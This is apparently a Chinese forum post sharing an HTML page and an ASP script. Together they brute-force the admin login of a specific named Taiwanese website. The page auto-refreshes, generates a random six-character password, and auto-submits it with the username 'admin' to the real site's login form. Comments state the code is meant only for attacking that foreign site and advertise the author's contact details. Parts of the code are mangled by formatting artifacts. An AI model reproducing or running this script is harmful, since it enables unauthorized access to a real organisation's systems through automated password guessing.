运行test.htm后进行密码登陆测试~!
-------------------------test.htm代码如下:
1<html>
2<head>
3<title></title>
4<meta content="5" http-equiv="refresh"/>
5</head>
6<body>
7<iframe border="0" frameborder="0" height="406" marginheight="1" marginwidth="1" name="top" scrolling="no" src="test.asp" width="859"></iframe>
8</body>
9</html>
--------------------------test.asp代码如下:
1
2'本代码只供攻击该台湾网站使用,请不要在国内站点进行测试
3'没进行随机代码重复限制
4'承接网络项目开发,业务联系QQ:61795
5'MSN:[email protected]
6Function RoundStr(StrLng)
7TmpStr = "0123456789abcdefghijklmnopqrstopwxyz"
8'TmpStr = "0123456789"
9for jjj = 1 to StrLng
10Randomize
11strLen = Len(TmpStr)
12t = Round((RND * (strLen-1))+1)
13s = s & mid(TmpStr,t,1)
14Next
15RoundStr = s
16End Function
17a=RoundStr(6)
1<html>
2<head>
3<title></title>
4<meta content="0" http-equiv="expires"/>
5</head>
6<body bottommargin="0" leftmargin="0" rightmargin="0" topmargin="0">
7<form action="http://www.tsu.org.tw/admin/login.php" method="POST" name="form1">
8<font size="2"><b>名称:</b></font>
9<input maxlength="256" name="Username" size="25" value="admin"/><font size="2"><b> <font size="2"><b>口令:</b></font>
10<input maxlength="256" name="Password" size="25" type="text" value="```
11=a
12```"/>
13<input type="submit" value="登 录"/></b></font></form>
14<p>当前测试的密码为:<font style="font:100pt"><b>```
15=a
16```</b></font></p>
17</body>
18</html>
1<script language="javascript">
2<!--
3this.document.forms[0].submit()
4//-->
5</script>